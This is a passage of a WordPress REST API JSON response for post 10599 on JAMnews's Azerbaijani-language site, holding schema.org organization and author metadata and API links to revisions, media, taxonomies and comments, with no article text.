Society","publisher":{"@id":"https:\/\/jam-news.net\/az\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/jam-news.net\/az\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"az"},{"@type":"Organization","@id":"https:\/\/jam-news.net\/az\/#organization","name":"JAMnews","url":"https:\/\/jam-news.net\/az\/","logo":{"@type":"ImageObject","inLanguage":"az","@id":"https:\/\/jam-news.net\/az\/#\/schema\/logo\/image\/","url":"https:\/\/jam-news.net\/app\/uploads\/2020\/05\/JAM_w.jpg","contentUrl":"https:\/\/jam-news.net\/app\/uploads\/2020\/05\/JAM_w.jpg","width":960,"height":960,"caption":"JAMnews"},"image":{"@id":"https:\/\/jam-news.net\/az\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/JAMnewsInEnglish\/","https:\/\/x.com\/JAMnewsCaucasus","https:\/\/www.instagram.com\/jam_news\/","https:\/\/www.youtube.com\/channel\/UCXQbUCme2pykuZYXWHx4VPg"]},{"@type":"Person","@id":"https:\/\/jam-news.net\/az\/#\/schema\/person\/67df3bb7adb46cd513fb9c4cb02361c6","name":"JAMnews","image":{"@type":"ImageObject","inLanguage":"az","@id":"https:\/\/jam-news.net\/az\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e5c27593ef900c3ab3deed4ed1c653d7?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e5c27593ef900c3ab3deed4ed1c653d7?s=96&d=mm&r=g","caption":"JAMnews"},"url":"https:\/\/jam-news.net\/az\/author\/margarita\/"}]}},"_links":{"self":[{"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/posts\/10599","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/comments?post=10599"}],"version-history":[{"count":1,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/posts\/10599\/revisions"}],"predecessor-version":[{"id":16966,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/posts\/10599\/revisions\/16966"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/media\/22081"}],"wp:attachment":[{"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/media?parent=10599"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/categories?post=10599"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/tags?post=10599"},{"taxonomy":"formation","embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/formation?post=10599"},{"taxonomy":"post-author","embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/post-author?post=10599"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/topic?post=10599"},{"taxonomy":"tooltip","embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/tooltip?post=10599"},{"taxonomy":"city","embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/city?post=10599"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}